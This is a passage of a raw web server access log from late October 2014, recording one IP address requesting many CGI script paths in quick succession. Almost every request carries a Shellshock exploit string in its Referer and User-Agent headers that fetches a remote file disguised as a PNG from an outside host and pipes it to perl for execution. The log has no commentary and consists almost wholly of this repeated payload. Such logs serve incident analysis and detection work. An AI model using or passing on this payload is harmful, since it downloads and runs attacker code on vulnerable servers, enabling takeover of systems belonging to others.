http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:57 +0200] "GET /sampleposteddata.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:30:58 +0200] "GET /sample04.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:01 +0200] "GET /sample01.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:02 +0200] "GET /reviews/newpro.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:03 +0200] "GET /redirects/redir.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:06 +0200] "GET /pub/english.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:06 +0200] "GET /process_bug.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:08 +0200] "GET /photodata/manage.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:09 +0200] "GET /photo/manage.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:10 +0200] "GET /page.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:11 +0200] "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0" 404 469 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:13 +0200] "GET /newpro.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:13 +0200] "GET /ncbook.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:15 +0200] "GET /mods/apage/apage.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:57 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:58 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:58 +0200] "GET /cgi-sys/entropybanner.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:31:59 +0200] "GET /cgi-sys/domainredirect.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:00 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:00 +0200] "GET /cgi-sys/addalink.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:01 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:04 +0200] "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:03 +0200] "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:02 +0200] "GET /cgi-bin/zml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:05 +0200] "GET /cgi-bin/wrap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:08 +0200] "GET /cgi-bin/whois_raw.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:08 +0200] "GET /cgi-bin/whois/whois.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:09 +0200] "GET /cgi-bin/whois.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:10 +0200] "GET /cgi-bin/webspirs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:10 +0200] "GET /cgi-bin/webmap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:11 +0200] "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:12 +0200] "GET /cgi-bin/webif.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:13 +0200] "GET /cgi-bin/webcart/webcart.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:14 +0200] "GET /cgi-bin/webbbs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:15 +0200] "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:16 +0200] "GET /cgi-bin/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:16 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:17 +0200] "GET /cgi-bin/vpasswd.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:20 +0200] "GET /cgi-bin/viralator.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:20 +0200] "GET /cgi-bin/viewcvs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:22 +0200] "GET /cgi-bin/upload.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:23 +0200] "GET /cgi-bin/ultraboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:23 +0200] "GET /cgi-bin/ttawebtop.cgi/HTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:32:26 +0200] "GET /cgi-bin/title.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:27 +0200] "GET /cgi-bin/tigvote.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:27 +0200] "GET /cgi-bin/tidfinder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:28 +0200] "GET /cgi-bin/testing_whateverHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:32:29 +0200] "GET /cgi-bin/test2.plHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:32:29 +0200] "GET /cgi-bin/test/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:30 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:32 +0200] "GET /cgi-bin/technote/main.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:32 +0200] "GET /cgi-bin/talkback.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:33 +0200] "GET /cgi-bin/survey.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:34 +0200] "GET /cgi-bin/store/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:34 +0200] "GET /cgi-bin/store/agora.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:35 +0200] "GET /cgi-bin/store.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:37 +0200] "GET /cgi-bin/spin_client.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:38 +0200] "GET /cgi-bin/snorkerz.cmdHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:32:39 +0200] "GET /cgi-bin/snorkerz.batHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:32:41 +0200] "GET /cgi-bin/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:42 +0200] "GET /cgi-bin/simplestmail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:43 +0200] "GET /cgi-bin/showcheckins.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:45 +0200] "GET /cgi-bin/shopper.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:46 +0200] "GET /cgi-bin/shop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:46 +0200] "GET /cgi-bin/sendform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:47 +0200] "GET /cgi-bin/search/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:48 +0200] "GET /cgi-bin/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:48 +0200] "GET /cgi-bin/searchHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:32:50 +0200] "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:51 +0200] "GET /cgi-bin/robpoll.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:51 +0200] "GET /cgi-bin/robadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:52 +0200] "GET /cgi-bin/responder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:54 +0200] "GET /cgi-bin/register.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:55 +0200] "GET /cgi-bin/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:56 +0200] "GET /cgi-bin/quizme.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:57 +0200] "GET /cgi-bin/quickstore.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:57 +0200] "GET /cgi-bin/publisher/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:58 +0200] "GET /cgi-bin/profile.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:59 +0200] "GET /cgi-bin/probecontrol.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:32:59 +0200] "GET /cgi-bin/printenvHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:33:00 +0200] "GET /cgi-bin/powerup/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:28 +0200] "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:27 +0200] "GET /cgi-bin/mrtg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:29 +0200] "GET /cgi-bin/moin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:31 +0200] "GET /cgi-bin/mmstdod.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:32 +0200] "GET /cgi-bin/mini_logger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:33 +0200] "GET /cgi-bin/man.shHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:33:37 +0200] "GET /cgi-bin/mailnews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:37 +0200] "GET /cgi-bin/maillist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:38 +0200] "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:39 +0200] "GET /cgi-bin/mail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:39 +0200] "GET /cgi-bin/magiccard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:40 +0200] "GET /cgi-bin/MachineInfoHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:33:41 +0200] "GET /cgi-bin/lwgate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:41 +0200] "GET /cgi-bin/lookwho.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:42 +0200] "GET /cgi-bin/logit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:44 +0200] "GET /cgi-bin/log-reader.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:44 +0200] "GET /cgi-bin/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:45 +0200] "GET /cgi-bin/lastlines.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:47 +0200] "GET /cgi-bin/jammail.plHTTP/1.0" 503 323 "-" "-" +203.162.54.69 - - [31/Oct/2014:23:33:47 +0200] "GET /cgi-bin/infosrch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:48 +0200] "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:50 +0200] "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:51 +0200] "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:53 +0200] "GET /cgi-bin/html2wml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:33:55 +0200] "GET /cgi-bin/hsx.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:00 +0200] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:00 +0200] "GET /cgi-bin/gm.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:01 +0200] "GET /cgi-bin/gm-cplog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:02 +0200] "GET /cgi-bin/gm-authors.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:03 +0200] "GET /cgi-bin/getdoc.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:04 +0200] "GET /cgi-bin/generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:06 +0200] "GET /cgi-bin/gbadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:07 +0200] "GET /cgi-bin/FormHandler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:09 +0200] "GET /cgi-bin/fom.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:10 +0200] "GET /cgi-bin/flexform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - [31/Oct/2014:23:34:10 +0200] "GET /cgi-bin/finger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +203.162.54.69 - - 